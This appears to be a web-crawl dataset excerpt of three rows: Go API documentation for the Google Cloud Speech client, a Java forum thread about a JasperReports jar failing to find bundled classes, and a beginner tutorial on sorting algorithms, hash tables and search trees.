Dataset columns: text (string, lengths 20 to 1.01M), url (string, lengths 14 to 1.25k), dump (string, lengths 9 to 15), lang (4 classes), source (4 classes).
import "cloud.google.com/go/speech/apiv1beta1" Package speech is an experimental, auto-generated package for the speech API. Google Cloud Speech API. AsyncRecognizeOperation manages a long-running operation from AsyncRecognize. func (op *AsyncRecognizeOperation) Done() bool Done reports whether the long-running operation has completed. func (op *AsyncRecognizeOperation) Metadata() (*speechpb.AsyncRecogn (op *AsyncRecognizeOperation) Name() string Name returns the name of the long-running operation. The name is assigned by the server and is unique within the service from which the operation is created. func (op *AsyncRecognizeOperation) Poll(ctx context.Context) (*speechpb.AsyncRecogn (op *AsyncRecognizeOperation) Wait(ctx context.Context) (*speechpb.AsyncRecognizeResponse, error) Wait blocks until the long-running operation is completed, returning the response and any errors encountered. See documentation of Poll for error-handling information. type CallOptions struct { SyncRecognize []gax.CallOption AsyncRecognize []gax.CallOption StreamingRecognize []gax.CallOption } CallOptions contains the retry settings for each method of Client. type Client struct { // The call options for this service. CallOptions *CallOptions // contains filtered or unexported fields } Client is a client for interacting with Google Cloud Speech API. NewClient creates a new speech client. Service that implements Google Cloud Speech API. func (c *Client) AsyncRecognize(ctx context.Context, req *speechpb.AsyncRecognizeRequest, opts ...gax.CallOption) (*AsyncRecognizeOperation, error) AsyncRecognize performs asynchronous speech recognition: receive results via the [google.longrunning.Operations] (/speech/reference/rest/v1beta1/operations#Operation) interface. Returns either an `Operation.error` or an `Operation.response` which contains an `AsyncRecognizeResponse` message. Code: ctx := context.Background() c, err := speech.NewClient(ctx) if err != nil { // TODO: Handle error. } req := &speechpb.AsyncRecognizeRequest{ // TODO: Fill request struct fields. } op, err := c.AsyncRecognize(ctx, req) if err != nil { // TODO: Handle error. } resp, err := op.Wait(ctx) if err != nil { // TODO: Handle error. } // TODO: Use resp. _ = resp func (c *Client) AsyncRecognizeOperation(name string) *AsyncRecognizeOperation AsyncRecognizeOperation returns a new AsyncRecognizeOperation from a given name. The name must be that of a previously created AsyncRecognizeOperation, possibly from a different process. Close closes the connection to the API service. The user should invoke this when the client is no longer required. func (c *Client) Connection() *grpc.ClientConn Connection returns the client's connection to the API service. SetGoogleClientInfo sets the name and version of the application in the `x-goog-api-client` header passed on each request. Intended for use by Google-written clients. } func (c *Client) SyncRecognize(ctx context.Context, req *speechpb.SyncRecognizeRequest, opts ...gax.CallOption) (*speechpb.SyncRecognizeResponse, error) SyncRecognize performs synchronous speech recognition: receive results after all audio has been sent and processed. Code: ctx := context.Background() c, err := speech.NewClient(ctx) if err != nil { // TODO: Handle error. } req := &speechpb.SyncRecognizeRequest{ // TODO: Fill request struct fields. } resp, err := c.SyncRecognize(ctx, req) if err != nil { // TODO: Handle error. } // TODO: Use resp. _ = resp Package speech imports 12 packages (graph) and is imported by 1 packages. Updated 2017-05-19. 
https://godoc.org/cloud.google.com/go/speech/apiv1beta1
CC-MAIN-2017-22
en
refinedweb
: Beginning Java Unable to execute jar file....got following stack trace. Jigar Naik Ranch Hand Posts: 763 posted 12 years ago Hi, i'm using jasper report for generating report. following is my java class for displaying report, package com.india.mumbai.tg; import net.sf.jasperreports.view.JasperViewer; import net.sf.jasperreports.engine.xml.JRXmlLoader; import net.sf.jasperreports.engine.JasperCompileManager; import net.sf.jasperreports.engine.JasperFillManager; import net.sf.jasperreports.engine.JasperPrint; import net.sf.jasperreports.engine.design.JasperDesign; import net.sf.jasperreports.engine.JasperReport; import java.io.OutputStream; import java.sql.DriverManager; import com.mysql.jdbc.Connection; /** * Driver program to connect to a database and to view a jasper report (.jrxml) * @author Oguzhan Topsakal * @since 23 March 2006 * * Required jar files to run this class: * 1. jasperreports-1.2.0.jar * 2. classes12.jar (for Oracle JDBC connection) * 3. commons-beanutils-1.5.jar * 4. commons-collections-2.1.jar * 5. commons-digester-1.7.jar * 6. commons-logging-1.0.2.jar * */ public class ReportDriver { /** * Takes 3 parameters: databaseName, userName, password * and connects to the database. * @param databaseName holds database name, * @param userName holds user name * @param password holds password to connect the database, * @return Returns the JDBC connection to the database */ public static Connection connectDB(String databaseName, String userName, String password) { Connection jdbcConnection = null; try{ //Class.forName(connectionClass); //Connection conn = DriverManager.getConnection(connectionName); Class.forName("com.mysql.jdbc.Driver"); jdbcConnection = (Connection)DriverManager.getConnection("jdbc:mysql://localhost:3306/utility?user=root&password=root"); }catch(Exception ex) { String connectMsg = "Could not connect to the database: " + ex.getMessage() + " " + ex.getLocalizedMessage(); System.out.println(connectMsg); } return jdbcConnection; } /** * Takes 4 parameters: databaseName, userName, password, reportFileLocation * and connects to the database and prepares and views the report. * @param databaseName holds database name, * @param userName holds user name * @param password holds password to connect the database, * @param reportFile holds the location of the Jasper Report file (.jrxml) */ public static void runReport() { try{ String reportFile = "contactReport.jrxml"; JasperDesign jasperDesign = JRXmlLoader.load(reportFile); JasperReport jasperReport = JasperCompileManager.compileReport(jasperDesign); Class.forName("com.mysql.jdbc.Driver"); Connection jdbcConnection = (Connection)DriverManager.getConnection("jdbc:mysql://localhost:3306/utility?user=root&password=root"); JasperPrint jasperPrint = JasperFillManager.fillReport(jasperReport, null, jdbcConnection); JasperViewer.viewReport(jasperPrint); }catch(Exception ex) { String connectMsg = "Could not create the report " + ex.getMessage() + " " + ex.getLocalizedMessage(); System.out.println(connectMsg); } } /** * Uses runReport method to connect to the database and to prepare and view the report. 
* @param args Takes 4 arguments as an input: databaseName, userName, password, reportFileLocation * args[0] holds database name, * args[1] holds user name * args[2] holds password to connect the database, * args[3] holds the location of the Jasper Report file (.jrxml) */ public static void main(String[] args) { runReport(); } }

I have created a jar file (JR.jar). The MANIFEST.MF contains:

Manifest-Version: 1.0
Sealed: true
Main-Class: com.india.mumbai.tg.ReportDriver

When I double-click the JR.jar file it gives me the following error: "Could not find the main class. Program will exit." I have tested JR.jar with the following command and got the following stack trace:

C:\Program Files\Java\jdk1.6.0\bin>java -jar JR.jar
Exception in thread "main" java.lang.NoClassDefFoundError: net/sf/jasperreports/engine/design/JasperDesign

I'm also bundling all the required jar files inside my JR.jar file: jasperreports-1.2.0.jar, commons-beanutils-1.5.jar, commons-collections-2.1.jar, commons-digester-1.7.jar, commons-logging-1.0.2.jar. I'm using JBoss Eclipse IDE 1.6 and Jasper Assist for creating the jasper report, and I have tried creating the jar file both from DOS and from the IDE, but I get the same error. Can anybody help me out?

Maurizio Nagni Ranch Hand Posts: 75 posted 12 years ago
You cannot include jars in a jar. The classloaders will not find classes inside of nested jars. To do this you'll need to write (or find) a custom classloader, or better, add the required jars to your JAR file's Class-Path.

Paul Sturrock Bartender Posts: 10336 posted 12 years ago
Not an advanced question. Moving...

Jesper de Jong Java Cowboy Posts: 16084 posted 12 years ago
Also make sure that your manifest file ends with an empty line, otherwise the last line in the manifest file will not be parsed correctly. See this page, which says: "Warning: The text file from which you are creating the manifest must end with a new line or carriage return. The last line will not be parsed properly if it does not end with a new line or carriage return."
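For reference, a manifest along the lines Maurizio and Jesper describe might look like the following. This is only a sketch: it assumes the listed jars sit in the same directory as JR.jar (Class-Path entries are relative URLs separated by spaces, long lines are continued by starting the next line with a single space, and the file must end with a newline):

Manifest-Version: 1.0
Main-Class: com.india.mumbai.tg.ReportDriver
Class-Path: jasperreports-1.2.0.jar commons-beanutils-1.5.jar
 commons-collections-2.1.jar commons-digester-1.7.jar
 commons-logging-1.0.2.jar

With a manifest like this, the dependent jars are left outside JR.jar, and "java -jar JR.jar" will pick them up from the same directory instead of looking for them inside the jar.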
https://coderanch.com/t/406700/java/Unable-execute-jar-file-stack
CC-MAIN-2019-47
en
refinedweb
Question: What are some use cases for using named imports with the import keyword (to import a default export)?

Answer: We can combine named imports with the import statement (to import a default export) for the same reasons we would combine named exports and default exports. Generally, this means importing the expected export of a module (the default export) together with any utility exports that may not be strictly necessary but could come in handy (the named exports), and/or importing pieces of a module that are the internals of a private variable without exposing the entire private variable (again, these would be named exports).
https://discuss.codecademy.com/t/what-are-some-use-cases-for-using-named-imports-with-the-import-keyword-to-import-a-default-export/385675
CC-MAIN-2019-47
en
refinedweb
The QUsbStorageGadget class is used to enable the mass storage class of USB gadgets. More...

#include <QUsbStorageGadget>

Inherits QUsbGadget. Inherited by QUsbStorageGadgetProvider.

The QUsbStorageGadget class is used to enable the mass storage class of USB gadgets. It is used to configure the USB gadget hardware as a USB mass storage device. The following code will export the block device /dev/sda:

QUsbStorageGadget *gadget = new QUsbStorageGadget;
if (gadget->available()) {
    connect(gadget, SIGNAL(activated()), this, SLOT(storageActivated()));
    gadget->setBackingStore(QStringList() << "/dev/sda");
    gadget->activate();
}

Warning: Filesystem drivers in most operating systems expect exclusive access to the underlying block device. Any modification to the on-disk data structures that does not go through the filesystem layer can result in data loss and system crashes. Therefore it is important that the backing store block devices are unmounted prior to activating the USB storage gadget.

See also QUsbManager and UsbGadgetTask.

Constructs a new QUsbStorageGadget object in group and attaches it to parent. If mode is Client, then the object is constructed in client mode and group may be empty to indicate that the default group should be used.

Adds device path to the list of backing stores.

Returns the list of devices that will be used as the backing store. See also setBackingStore().

Removes device path from the list of backing stores.

Sets the list of backing store devices to paths. See also backingStore().
https://doc.qt.io/archives/qtextended4.4/qusbstoragegadget.html
CC-MAIN-2019-47
en
refinedweb
Provided by: libgtk2-perl-doc_1.24992-1build2_all NAME Gtk2::Pango::AttrScale - backwards compatibility wrapper for Pango::AttrScale DESCRIPTION As of Gtk2 1.220, pango bindings are provided by the standalone Pango module. This namespace is provided for backwards compatibility. The relevant documentation moved to Pango and is linked to below. SEE ALSO Gtk2, Pango::AttrScale Copyright (C) 2003-2011 by the gtk2-perl team. This software is licensed under the LGPL. See Gtk2 for a full notice.
http://manpages.ubuntu.com/manpages/disco/man3/Gtk2::Pango::AttrScale.3pm.html
CC-MAIN-2019-47
en
refinedweb
2. Sorting
2.1 Insertion Sort
2.2 Shell Sort
2.3 Quicksort
2.4 Comparison of Methods
3. Dictionaries
3.1 Hash Tables
3.2 Binary Search Trees
3.3 Red-Black Trees
3.4 Skip Lists
3.5 Comparison of Methods
4. Code Listings
4.1 Insertion Sort Code
4.2 Shell Sort Code
4.3 Quicksort Code
4.4 Qsort Code
4.5 Hash Table Code
4.6 Binary Search Tree Code
4.7 Red-Black Tree Code
4.8 Skip List Code
5. Bibliography

Preface

This booklet contains a collection of sorting and searching algorithms. While many books on data structures describe sorting and searching algorithms, most assume a background in calculus and probability theory. Although a formal presentation and proof of asymptotic behavior is important, a more intuitive explanation is often possible. The way each algorithm works is described in easy-to-understand terms. It is assumed that you have knowledge equivalent to an introductory course in C or Pascal. In particular, you should be familiar with arrays and have a basic understanding of pointers. The material is presented in an orderly fashion, beginning with easy concepts and progressing to more complex ideas. Even though this collection is intended for beginners, more advanced users may benefit from some of the insights offered. In particular, the sections on hash tables and skip lists should prove interesting.

Santa Cruz, California
Thomas Niemann
March, 1995

1. Introduction

Arrays and linked lists are two basic data structures used to store information. We may wish to search, insert or delete records in a database based on a key value. This section examines the performance of these operations on arrays and linked lists.

Arrays

Figure 1.1 shows an array, seven elements long, containing numeric values. To search the array sequentially, we may use the algorithm in Figure 1.2. The maximum number of comparisons is 7, and occurs when the key we are searching for is in A[6]. If the data is sorted, a binary search may be done (Figure 1.3). Variables Lb and Ub keep track of the lower bound and upper bound of the array, respectively. We begin by examining the middle element of the array. If the key we are searching for is less than the middle element, then it must reside in the top half of the array. Thus, we set Ub to (M - 1). This restricts our next iteration through the loop to the top half of the array. In this way, each iteration halves the size of the array to be searched. For example, the first iteration will leave 3 items to test. After the second iteration, there will be 1 item left to test. Thus it takes only three iterations to find any number.

Figure 1.1: An Array

This is a powerful method. For example, if the array size is 1023, we can narrow the search to 511 items in one comparison. Another comparison, and we're looking at only 255 elements. In fact, only 10 comparisons are needed to search an array containing 1023 elements.

Inserting a new value into an array requires shifting elements to make room, and a similar problem arises when deleting numbers. To improve the efficiency of insert and delete operations, linked lists may be used.

int function SequentialSearch (Array A, int Lb, int Ub, int Key);
begin
    for I = Lb to Ub do
        if (A[I] = Key) then
            return I;
    return -1;
end;

Figure 1.2: Sequential Search

int function BinarySearch (Array A, int Lb, int Ub, int Key);
begin
    do forever
        M = (Lb + Ub) / 2;
        if (Key < A[M]) then
            Ub = M - 1;
        else if (Key > A[M]) then
            Lb = M + 1;
        else
            return M;
        if (Lb > Ub) then
            return -1;
end;

Figure 1.3: Binary Search

Linked Lists

In Figure 1.4 we have the same values stored in a linked list.
Assuming pointers X and P, as shown in the figure, value 18 may be inserted as follows:

X->Next = P->Next;
P->Next = X;

Insertion (and deletion) are very efficient using linked lists. You may be wondering how P was set in the first place. Well, we had to search the list in a sequential fashion to find the insertion point for X. Thus, while we improved our insert and delete performance, it has been at the expense of search time.

Figure 1.4: A Linked List

Timing Estimates

Several methods may be used to compare the performance of algorithms. One way is simply to run several tests for each algorithm and compare the timings. Another way is to estimate the time required. For example, we may state that search time is O(n) (big-oh of n). This means that, for large n, search time is no greater than the number of items n in the list. The big-O notation does not describe the exact time that an algorithm takes, but only indicates an upper bound on execution time within a constant factor. If an algorithm takes O(n^2) time, then execution time grows no worse than the square of the size of the list. To see the effect this has, Table 1.1 illustrates growth rates for various functions. A growth rate of O(lg n) occurs for algorithms similar to the binary search. The lg (logarithm, base 2) function increases by one when n is doubled. Recall that we can search twice as many items with one more comparison in the binary search. Thus the binary search is an O(lg n) algorithm.

Table 1.1: Growth Rates

If the values in Table 1.1 represented microseconds, then an O(lg n) algorithm may take 20 microseconds to process 1,048,576 items, an O(n^1.25) algorithm might take 33 seconds, and an O(n^2) algorithm might take up to 12 days! In the following chapters a timing estimate for each algorithm, using big-O notation, will be included. For a more formal derivation of these formulas you may wish to consult the references.

Summary

As we have seen, sorted arrays may be searched efficiently using a binary search. However, we must have a sorted array to start with. In the next section various ways to sort arrays will be examined. It turns out that this is computationally expensive, and considerable research has been done to make sorting algorithms as efficient as possible.

Linked lists improved the efficiency of insert and delete operations, but searches were sequential and time-consuming. Algorithms exist that do all three operations efficiently, and they will be discussed in the section on dictionaries.

2. Sorting

2.1 Insertion Sort

One of the simplest methods to sort an array is sort by insertion. An example of an insertion sort occurs in everyday life while playing cards. To sort the cards in your hand you extract a card, shift the remaining cards, and then insert the extracted card in the correct place. The process is repeated until all the cards are in the correct sequence. Both average and worst-case time is O(n^2). For further reading, consult Knuth[1].

Theory

In Figure 2.1(a) we extract the 3. Then the above elements are shifted down until we find the correct place to insert the 3. This process repeats in Figure 2.1(b) for the number 1. Finally, in Figure 2.1(c), we complete the sort by inserting 2 in the correct place.

Assuming there are n elements in the array, we must index through n - 1 entries. For each entry, we may need to examine and shift up to n - 1 other entries. For this reason, sorting is a time-consuming process.

The insertion sort is an in-place sort. That is, we sort the array in-place. No extra memory is required. The insertion sort is also a stable sort.
Stable sorts retain the original ordering of keys when identical keys are present in the input data.

Figure 2.1: Insertion Sort

Implementation

An ANSI-C implementation for insertion sort may be found in Section 4.1. Typedef T and comparison operator CompGT should be altered to reflect the data stored in the table. Pointer arithmetic was used, rather than array references, for efficiency.

2.2 Shell Sort

Shell sort, developed by Donald L. Shell, is a non-stable in-place sort. Shell sort improves on the efficiency of insertion sort by quickly shifting values to their destination. Average sort time is O(n^1.25), while worst-case time is O(n^1.5). For further reading, consult Knuth[1].

Theory

In Figure 2.2(a) we have an example of sorting by insertion. First we extract 1, shift 3 and 5 down one slot, and then insert the 1. Thus, two shifts were required. In the next frame, two shifts are required before we can insert the 2. The process continues until the last frame, where a total of 2 + 2 + 1 = 5 shifts have been made.

In Figure 2.2(b) an example of shell sort is illustrated. We begin by doing an insertion sort using a spacing of two. In the first frame we examine numbers 3-1. Extracting 1, we shift 3 down one slot for a shift count of 1. Next we examine numbers 5-2. We extract 2, shift 5 down, and then insert 2. After sorting with a spacing of two, a final pass is made with a spacing of one. This is simply the traditional insertion sort. The total shift count using shell sort is 1 + 1 + 1 = 3. By using an initial spacing larger than one, we were able to quickly shift values to their proper destination.

Figure 2.2: Shell Sort

To implement shell sort, various spacings may be used. Typically the array is sorted with a large spacing, the spacing reduced, and the array sorted again. On the final sort, spacing is one. Although shell sort is easy to comprehend, formal analysis is difficult. In particular, optimal spacing values elude theoreticians. Knuth[1] has experimented with several values and recommends that spacing (h) for an array of size N be based on the following formula:

h(1) = 1
h(s+1) = 3*h(s) + 1

Thus, values of h are computed as follows: 1, 4, 13, 40, 121, 364, 1093, 3280, ...

To sort 100 items we first find an h(s) such that h(s) >= 100. For 100 items, h(5) = 121 is selected. Our final value, h(t), is two steps lower, or h(3). Therefore our sequence of h values will be 13-4-1. Once the initial h value has been determined, subsequent values may be calculated using the formula h(s-1) = h(s) / 3 (integer division, as in the listing in Section 4.2).

Implementation

An ANSI-C implementation of shell sort may be found in Section 4.2. Typedef T and comparison operator CompGT should be altered to reflect the data stored in the array. When computing h, care must be taken to avoid underflows or overflows. The central portion of the algorithm is an insertion sort with a spacing of h. To terminate the inner loop correctly, it is necessary to compare J before decrement. Otherwise, the pointer value may wrap through zero, resulting in unexpected behavior.

2.3 Quicksort

Although the shell sort algorithm is significantly better than insertion sort, there is still room for improvement. One of the most popular sorting algorithms is quicksort. Quicksort executes in O(n lg n) on average, and O(n^2) in the worst case. However, with proper precautions, worst-case behavior is very unlikely. Quicksort is a non-stable sort. It is not an in-place sort as stack space is required. For further reading, consult Cormen[2].

Theory

The quicksort algorithm works by partitioning the array to be sorted, then recursively sorting each partition. In Partition (Figure 2.3), one of the array elements is selected as a pivot value.
Values smaller than the pivot value are placed to the left of the pivot, while larger values are placed to the right.

int function Partition (Array A, int Lb, int Ub);
begin
    select a pivot from A[Lb]..A[Ub];
    reorder A[Lb]..A[Ub] such that:
        all values to the left of the pivot are <= pivot
        all values to the right of the pivot are >= pivot
    return pivot position;
end;

procedure QuickSort (Array A, int Lb, int Ub);
begin
    if Lb < Ub then
        M = Partition (A, Lb, Ub);
        QuickSort (A, Lb, M - 1);
        QuickSort (A, M + 1, Ub);
end;

Figure 2.3: Quicksort Algorithm

In Figure 2.4(a), the pivot selected is 3. Indices are run starting at both ends of the array. Index i starts on the left and selects an element that is larger than the pivot, while index j starts on the right and selects an element that is smaller than the pivot. These elements are then exchanged, as is shown in Figure 2.4(b). QuickSort recursively sorts the two subarrays, resulting in the array shown in Figure 2.4(c).

Figure 2.4: Quicksort Example

In this manner, correct ordering is maintained and QuickSort succeeds in sorting the array. If we're lucky the pivot selected will be the median of all values, thus equally dividing the array. For a moment, let's assume that this is the case. Since the array is split in half at each step, and Partition must eventually examine all n elements, the run time is O(n lg n).

To find a pivot value, Partition could simply select the first element (A[Lb]). All other values would be compared to the pivot value, and placed either to the left or right of the pivot as appropriate. However, there is one case that fails miserably. Suppose the array was originally in order. Partition would always select the lowest value as a pivot and split the array with one element in the left partition, and Ub - Lb elements in the other. Each recursive call to quicksort would only diminish the size of the array to be sorted by one. Thus, n recursive calls would be required to do the sort, resulting in an O(n^2) run time. One solution to this problem is to randomly select an item as a pivot. This would make it extremely unlikely that worst-case behavior would occur.

Implementation

An ANSI-C implementation of the quicksort algorithm may be found in Section 4.3. Typedef T and comparison operator CompGT should be altered to reflect the data stored in the array. Several enhancements have been made to the basic quicksort algorithm:

- The center element is selected as a pivot in Partition. If the list is partially ordered, this will be a good choice. Worst-case behavior occurs when the center element happens to be the largest or smallest element each time Partition is invoked.

- For short arrays, InsertSort is called. Due to recursion and other overhead, quicksort is not an efficient algorithm to use on small arrays. Consequently, any array with fewer than 12 elements is sorted using an insertion sort. The optimal cutoff value is not critical and varies based on the quality of the generated code.

- Tail recursion occurs when the last statement in a function is a call to the function itself. Tail recursion may be replaced by iteration, which results in a better utilization of stack space. This has been done for the second call to QuickSort in Figure 2.3.

- After an array is partitioned, the smallest partition is sorted first. This results in a better utilization of stack space, as short partitions are quickly sorted and dispensed with.
- Pointer arithmetic, rather than array indices, is used for efficient execution.

Also included is a listing for qsort (Section 4.4), an ANSI-C standard library function usually implemented with quicksort. For this implementation, recursive calls were replaced by explicit stack operations. Table 2.1 shows timing statistics and stack utilization before and after the enhancements were applied.

2.4 Comparison of Methods

In this section we will compare the sorting algorithms covered: insertion sort, shell sort and quicksort. There are several factors that influence the choice of a sorting algorithm:

Stable sort. Recall that a stable sort will leave identical keys in the same relative position in the sorted output. Insertion sort is the only algorithm covered that is stable.

Space. An in-place sort does not require any extra space to accomplish its task. Both insertion sort and shell sort are in-place sorts. Quicksort requires stack space for recursion, and thus is not an in-place sort. However, the amount required was considerably reduced by tinkering with the algorithm.

Time. The time required to sort a dataset can easily become astronomical (Table 1.1). Table 2.2 shows the relative timings for each method. The timing tests are described below.

Simplicity. The number of statements required for each algorithm may be found in Table 2.2. Simpler algorithms result in fewer programming errors.

The time required to sort a randomly ordered dataset is shown in Table 2.3.

3. Dictionaries

3.1 Hash Tables

A dictionary requires that search, insert and delete operations be supported. One of the most effective ways to implement a dictionary is through the use of hash tables. Average time to search for an element is O(1), while worst-case time is O(n). Cormen[2] and Knuth[1] both contain excellent discussions on hashing. In case you decide to read more material on this topic, you may want to know some terminology. The technique presented here is chaining, also known as open hashing[3]. An alternative technique, known as closed hashing[3], or open addressing[1], is not presented. Got that?

Theory

A hash table is simply an array that is addressed via a hash function. For example, in Figure 3.1, HashTable is an array with 8 elements. Each element is a pointer to a linked list of numeric data. The hash function for this example simply divides the data key by 8 and uses the remainder as an index into the table. To insert a new item in the table, we hash the key to determine which list the item goes on, and then insert the item at the beginning of the list. For example, to insert 11, we divide 11 by 8 giving a remainder of 3. Thus, 11 goes on the list starting at HashTable[3]. To find a number, we hash the number and chain down the correct list to see if it is in the table. To delete a number, we find the number and remove the node from the linked list.

If the hash function is uniform, or equally distributes the data keys among the hash table indices, then hashing effectively subdivides the list to be searched. Worst-case behavior occurs when all keys hash to the same index. Then we simply have a single linked list that must be sequentially scanned. Consequently, it is important to choose a good hash function. Several methods may be used to hash key values. To illustrate the techniques, I will assume unsigned char is 8-bits, unsigned short int is 16-bits and unsigned long int is 32-bits.

Division method (tablesize = prime). This technique was used in the preceding example. A HashValue, from 0 to (HashTableSize - 1), is computed by dividing the key value by the size of the hash table and taking the remainder.
For example:

typedef int HashIndexType;
HashIndexType Hash(int Key) {
    return Key % HashTableSize;
}

Selecting an appropriate HashTableSize is important to the success of this method. For example, a HashTableSize of two would yield even hash values for even Keys, and odd hash values for odd Keys. This is an undesirable property, as all keys would hash to the same value if they happened to be even. If HashTableSize is a power of two, then the hash function simply selects a subset of the Key bits as the table index. To obtain a more random scattering, HashTableSize should be a prime number not too close to a power of two.

Multiplication method (tablesize = 2^n). The multiplication method may be used for a HashTableSize that is a power of 2. The Key is multiplied by a constant, and then the necessary bits are extracted to index into the table. Knuth[1] recommends using the fractional part of the golden ratio, (sqrt(5) - 1)/2, as the constant. The following definitions may be used for the multiplication method:

/* 8-bit index */
typedef unsigned char HashIndexType;
static const HashIndexType K = 158;

/* 16-bit index */
typedef unsigned short int HashIndexType;
static const HashIndexType K = 40503;

/* 32-bit index */
typedef unsigned long int HashIndexType;
static const HashIndexType K = 2654435769;

/* w = bitwidth(HashIndexType), size of table = 2**m */
static const int S = w - m;
HashIndexType HashValue = (HashIndexType)(K * Key) >> S;

For example, if HashTableSize is 1024 (2^10), then a 16-bit index is sufficient and S would be assigned a value of 16 - 10 = 6. Thus, we have:

typedef unsigned short int HashIndexType;
HashIndexType Hash(int Key) {
    static const HashIndexType K = 40503;
    static const int S = 6;
    return (HashIndexType)(K * Key) >> S;
}

Variable string addition method (tablesize = 256). To hash a variable-length string, each character is added, modulo 256, to a total. A HashValue, range 0-255, is computed.

typedef unsigned char HashIndexType;
HashIndexType Hash(char *str) {
    HashIndexType h = 0;
    while (*str) h += *str++;
    return h;
}

Variable string exclusive-or method (tablesize = 256). This method is similar to the addition method, but successfully distinguishes similar words and anagrams. To obtain a hash value in the range 0-255, all bytes in the string are exclusive-or'd together. However, in the process of doing each exclusive-or, a random component is introduced.

typedef unsigned char HashIndexType;
unsigned char Rand8[256];
HashIndexType Hash(char *str) {
    unsigned char h = 0;
    while (*str) h = Rand8[h ^ *str++];
    return h;
}

Rand8 is a table of 256 8-bit unique random numbers. The exact ordering is not critical. The exclusive-or method has its basis in cryptography, and is quite effective[4].

Variable string exclusive-or method (tablesize <= 65536). If we hash the string twice, we may derive a hash value for an arbitrary table size up to 65536. The second time the string is hashed, one is added to the first character. Then the two 8-bit hash values are concatenated together to form a 16-bit hash value.
typedef unsigned short int HashIndexType;
unsigned char Rand8[256];
HashIndexType Hash(char *str) {
    HashIndexType h;
    unsigned char h1, h2;
    if (*str == 0) return 0;
    h1 = *str; h2 = *str + 1; str++;
    while (*str) {
        h1 = Rand8[h1 ^ *str];
        h2 = Rand8[h2 ^ *str];
        str++;
    }
    /* h is in range 0..65535 */
    h = ((HashIndexType)h1 << 8) | (HashIndexType)h2;
    /* use division method to scale */
    return h % HashTableSize;
}

Assuming n data items, the hash table size should be large enough to accommodate a reasonable number of entries. As seen in Table 3.1, a larger table size considerably reduces the length of the list to be searched. As we see in Table 3.1, there is much leeway in the choice of table size.

size  time    size  time
1     869     128   9
2     432     256   6
4     214     512   4
8     106     1024  4
16    54      2048  3
32    28      4096  3
64    15      8192  3

Table 3.1: HashTableSize vs. Time (ms), 4096 entries

Implementation

An ANSI-C implementation of a hash table may be found in Section 4.5. Typedef T and comparison operator CompEQ should be altered to reflect the data stored in the table. HashTableSize must be determined and the HashTable allocated. The division method was used in the Hash function. InsertNode allocates a new node and inserts it in the table. DeleteNode deletes and frees a node from the table. FindNode searches the table for a particular value.

3.2 Binary Search Trees

In Section 1 we used the binary search technique to efficiently search data stored in an array. This method required that the data be sorted and kept in an array, which makes insertions and deletions expensive. Binary search trees store data in nodes that are linked in a tree-like fashion, so insertions and deletions are efficient; for randomly inserted data, search time is O(lg n). Worst-case behavior occurs when ordered data is inserted. In this case the search time is O(n). See Cormen[2] for a more detailed description.

Theory

A binary search tree is a tree where each node has a left and right child. Either child, or both children, may be missing. Figure 3.2 illustrates a binary search tree. Assuming Key represents the value of a given node, then a binary search tree also has the following property: all children to the left of the node have values smaller than Key, and all children to the right of the node have values larger than Key. The top of a tree is known as the root, and the exposed nodes at the bottom are known as leaves. In Figure 3.2, the root is node 20 and the leaves are at the bottom of the tree. To search the tree for a given value, we start at the root and work down. For example, to search for 16, we first note that 16 < 20 and we traverse to the left child. The second comparison finds that 16 > 7, so we traverse to the right child. On the third comparison, we succeed.

Each comparison results in reducing the number of items to inspect by one-half. In this respect, the algorithm is similar to a binary search on an array. However, this is true only if the tree is balanced. For example, Figure 3.3 shows another tree containing the same values. While it is a binary search tree, its behavior is more like that of a linked list, with search time increasing proportional to the number of elements stored.

Insertion and Deletion

Let us examine insertions in a binary search tree to determine the conditions that can create an unbalanced tree. To insert a new value, we search the tree until the search fails, and then attach the new node as a child of the last node examined (Figure 3.4). Now we can see how an unbalanced tree can occur. If the data is presented in an ascending sequence, each node will be added to the right of the previous node. This will create one long chain, or linked list. However, if data is presented for insertion in a random order, then a more balanced tree is possible.

Deletions are similar, but require that the binary search tree property be maintained. For example, if node 20 in Figure 3.4 is removed, it must be replaced by node 37. This results in the tree shown in Figure 3.5. The rationale for this choice is as follows. The successor for node 20 must be chosen such that all nodes to the right are larger. Thus, we need to select the smallest valued node to the right of node 20.

Implementation

An ANSI-C implementation of a binary search tree may be found in Section 4.6.
Typedef T and comparison operators CompLT and CompEQ should be altered to reflect the data stored in the tree. Each Node consists of Left, Right and Parent pointers designating each child and the parent. Data is stored in the Data field. The tree is based at Root, and is initially NULL. InsertNode allocates a new node and inserts it in the tree. DeleteNode deletes and frees a node from the tree. FindNode searches the tree for a particular value.

3.3 Red-Black Trees

Binary search trees work best when they are balanced, or the path length from root to any leaf is within some bounds. The red-black tree algorithm is a method for balancing trees. The name derives from the fact that each node is colored red or black, and the color of the node is instrumental in determining the balance of the tree. During insert and delete operations, nodes may be rotated to maintain tree balance. Both average and worst-case search time is O(lg n).

This is, perhaps, the most difficult section in the book. If you get glassy-eyed looking at tree rotations, try skipping to skip lists, the next section. For further reading, Cormen[2] has an excellent section on red-black trees.

Theory

A red-black tree is a balanced binary search tree with the following properties[2]:

1. Every node is colored red or black.
2. Every leaf is a NIL node, and is colored black.
3. If a node is red, then both its children are black.
4. Every simple path from a node to a descendant leaf contains the same number of black nodes.

The number of black nodes on a path from root to leaf is known as the black height of a tree. These properties guarantee that any path from the root to a leaf is no more than twice as long as any other. To see why this is true, consider a tree with a black height of two. The shortest distance from root to leaf is two, where both nodes are black. The longest distance from root to leaf is four, where the nodes are colored (root to leaf): red, black, red, black. It is not possible to insert more black nodes as this would violate property 4, the black-height requirement. Since red nodes must have black children (property 3), having two red nodes in a row is not allowed. Thus, the largest path we can construct consists of an alternation of red-black nodes, or twice the length of a path containing only black nodes. All operations on the tree must maintain the properties listed above. In particular, operations which insert or delete items from the tree must abide by these rules.

Insertion

To insert a node, we search the tree for an insertion point, and add the node to the tree. A new node will always be inserted as a leaf node at the bottom of the tree. After insertion, the node is colored red. Then the parent of the node is examined to determine if the red-black tree properties have been violated. If necessary, we recolor the node and do rotations to balance the tree.

By inserting a red node, we have preserved the black-height property (property 4). However, property 3 may be violated. This property states that both children of a red node must be black. While both children of the new node are black (they're NIL), consider the case where the parent of the new node is red. Inserting a red node under a red parent would violate this property. There are two cases to consider:

Red parent, red uncle: Figure 3.6 illustrates a red-red violation. Node X is the newly inserted node, with both parent and uncle colored red. A simple recoloring removes the red-red violation.
After recoloring, the grandparent (node B) must be checked for validity, as its parent may be red. Note that this has the effect of propagating a red node up the tree. On completion, the root of the tree is marked black. If it was originally red, then this has the effect of increasing the black-height of the tree.

